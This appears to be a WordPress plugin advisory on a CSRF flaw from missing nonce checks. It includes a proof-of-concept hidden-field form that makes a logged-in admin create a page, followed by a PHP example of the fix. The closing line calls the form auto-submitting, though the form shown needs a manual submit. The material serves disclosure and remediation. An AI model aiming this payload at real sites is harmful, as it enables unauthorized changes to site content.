The plugin does not implement nonce checks, which could allow attackers to make a logged-in admin create a new page and change its content via a CSRF attack.
<html>
<body>
<form action="https://example.com/wp-admin/admin.php" method="POST">
<input type="hidden" name="eeShortcode" value="Page Content" />
<input type="hidden" name="eeCreatePostType" value="Page" />
<input type="hidden" name="eeGo" value="Go" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
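
The missing control, shown as an added example rather than the plugin's own code: the form carries a WordPress nonce and the handler verifies it, along with the user's capability, before creating anything. The action name `ee_create_post`, the field `ee_nonce`, and the functions `ee_render_form` and `ee_handle_create` are hypothetical; only the `eeShortcode`, `eeCreatePostType` and `eeGo` fields come from the request above.

```php
<?php
// Added example. Hypothetical names: ee_create_post, ee_nonce,
// ee_render_form, ee_handle_create. Request fields are from the PoC form.

// Render side: embed a nonce bound to the current user and this action.
function ee_render_form() {
    echo '<form method="post">';
    wp_nonce_field( 'ee_create_post', 'ee_nonce' );
    echo '<input type="text" name="eeShortcode" />';
    echo '<select name="eeCreatePostType"><option>Page</option><option>Post</option></select>';
    echo '<input type="submit" name="eeGo" value="Go" />';
    echo '</form>';
}

// Handler side: verify the nonce before any state change.
function ee_handle_create() {
    if ( ! isset( $_POST['eeGo'] ) ) {
        return; // Not a submission of this form.
    }

    // Ends the request with a 403 when the nonce is missing or invalid,
    // which is the case for a form hosted on another origin.
    check_admin_referer( 'ee_create_post', 'ee_nonce' );

    // Allowlist of submitted type => (post type, capability needed to create it).
    $types = array(
        'Page' => array( 'page', 'edit_pages' ),
        'Post' => array( 'post', 'edit_posts' ),
    );
    $requested = isset( $_POST['eeCreatePostType'] )
        ? sanitize_text_field( wp_unslash( $_POST['eeCreatePostType'] ) ) : '';
    if ( ! isset( $types[ $requested ] ) ) {
        wp_die( 'Invalid post type.', '', array( 'response' => 400 ) );
    }
    list( $post_type, $capability ) = $types[ $requested ];
    if ( ! current_user_can( $capability ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }

    $content = isset( $_POST['eeShortcode'] )
        ? wp_kses_post( wp_unslash( $_POST['eeShortcode'] ) ) : '';
    wp_insert_post( array(
        'post_type'    => $post_type,
        'post_status'  => 'draft',
        'post_title'   => 'New ' . $requested,
        'post_content' => wp_slash( $content ), // wp_insert_post() expects slashed data.
    ) );
}
add_action( 'admin_init', 'ee_handle_create' );
```

With this in place, the auto-submitting form above is rejected because the attacker's page cannot read or predict the admin's nonce value.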